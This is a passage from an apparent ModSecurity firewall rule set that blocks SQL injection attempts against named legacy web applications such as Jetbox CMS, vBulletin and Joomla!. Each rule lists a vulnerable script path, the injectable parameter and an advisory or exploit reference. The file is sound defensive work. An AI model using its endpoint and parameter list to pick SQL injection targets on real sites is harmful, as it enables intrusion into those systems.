ixm_ixpnews.php story_id UPDATE SecRule REQUEST_LINE "@contains /ixm_ixpnews.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006212,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Ixprim SQL Injection Attempt -- ixm_ixpnews.php story_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21710'" SecRule &TX:'/SQL_INJECTION.*ARGS:story_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ixprim SQL Injection Attempt -- ixm_ixpnews.php story_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005347) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE SecRule REQUEST_LINE "@contains /auth.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005347,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25587'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005365) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php user UPDATE SecRule REQUEST_LINE "@contains /auth.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005365,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php user UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25587'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005371) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE SecRule REQUEST_LINE "@contains /auth.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005371,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25587'" SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Just For Fun Network Management System (JFFNMS) SQL Injection Attempt -- auth.php pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004157) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp title UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004157,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp title UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0940'" SecRule &TX:'/SQL_INJECTION.*ARGS:title/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp title UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004342) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp author UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004342,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp author UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3470'" SecRule &TX:'/SQL_INJECTION.*ARGS:author/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JGBBS SQL Injection Attempt -- search.asp author UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004485) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE SecRule REQUEST_LINE "@contains /G_Display.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004485,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24253'" SecRule &TX:'/SQL_INJECTION.*ARGS:iCategoryUnq/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- G_Display.php iCategoryUnq UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004491) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE SecRule REQUEST_LINE "@contains /Search/DisplayResults.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004491,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24253'" SecRule &TX:'/SQL_INJECTION.*ARGS:iSearchID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP JackKnife SQL Injection Attempt -- DisplayResults.php iSearchID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006497) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- login.php login_username UPDATE SecRule REQUEST_LINE "@contains /login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006497,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- login.php login_username UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4081'" SecRule &TX:'/SQL_INJECTION.*ARGS:login_username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- login.php login_username UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006503) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- news.php item UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006503,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- news.php item UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4081'" SecRule &TX:'/SQL_INJECTION.*ARGS:item/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jasmine CMS SQL Injection Attempt -- news.php item UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004082) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE SecRule REQUEST_LINE "@contains /admincp/attachment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004082,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE',tag:'web-application-attack',tag:'url,www.vbulletin.com/forum/project.php?issueid=21615'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004151) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE SecRule REQUEST_LINE "@contains /admincp/attachment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004151,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/24503'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- attachment.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004671) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- inlinemod.php postids UPDATE SecRule REQUEST_LINE "@contains /inlinemod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004671,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- inlinemod.php postids UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3387'" SecRule &TX:'/SQL_INJECTION.*ARGS:postids/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jelsoft vBulletin SQL Injection Attempt -- inlinemod.php postids UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003944) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- main_page.php UPDATE SecRule REQUEST_LINE "@contains /main_page.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003944,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- main_page.php UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- main_page.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- open_tree.php UPDATE SecRule REQUEST_LINE "@contains /open_tree.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003950,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- open_tree.php UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- open_tree.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003956) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- outputs.php UPDATE SecRule REQUEST_LINE "@contains /outputs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003956,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- outputs.php UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- outputs.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003962) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php view UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003962,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php view UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule &TX:'/SQL_INJECTION.*ARGS:view/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php view UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003968) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- opentree.php id UPDATE SecRule REQUEST_LINE "@contains /admin/cms/opentree.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003968,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- opentree.php id UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0027'" SecRule REQUEST_LINE "@contains id[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- opentree.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003974) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php login UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003974,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php login UPDATE',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0028'" SecRule &TX:'/SQL_INJECTION.*ARGS:login/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Jetbox CMS SQL Injection Attempt -- index.php login UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007349) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JiRos FAQ Manager SQL Injection Attempt -- index.asp tID UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007349,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JiRos FAQ Manager SQL Injection Attempt -- index.asp tID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2836'" SecRule &TX:'/SQL_INJECTION.*ARGS:tID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JiRos FAQ Manager SQL Injection Attempt -- index.asp tID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007355) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- openlink.asp LinkID UPDATE SecRule REQUEST_LINE "@contains /openlink.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007355,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- openlink.asp LinkID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'" SecRule &TX:'/SQL_INJECTION.*ARGS:LinkID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- openlink.asp LinkID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007361) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- viewlinks.asp CategoryID UPDATE SecRule REQUEST_LINE "@contains /viewlinks.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007361,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- viewlinks.asp CategoryID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'" SecRule &TX:'/SQL_INJECTION.*ARGS:CategoryID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JiRos Links Manager SQL Injection Attempt -- viewlinks.asp CategoryID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004378) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004378,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/3455/'" SecRule &TX:'/SQL_INJECTION.*ARGS:salary/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Labs JobSitePro SQL Injection Attempt -- search.php salary UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003763) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS John Mordo Jobs SQL Injection Attempt -- index.php cid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003763,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS John Mordo Jobs SQL Injection Attempt -- index.php cid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3672'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS John Mordo Jobs SQL Injection Attempt -- index.php cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005297) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005297,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005303) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005303,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005395) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005395,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005401) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE SecRule REQUEST_LINE "@contains /gmail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005401,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- gmail.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005407) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE SecRule REQUEST_LINE "@contains /example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005407,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005413) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE SecRule REQUEST_LINE "@contains /plugins/authentication/ldap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005413,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- ldap.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005419) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE SecRule REQUEST_LINE "@contains /modules/mod_mainmenu/menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005419,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- menu.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005425) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where UPDATE SecRule REQUEST_LINE "@contains /plugins/search/content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005425,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- content.php where 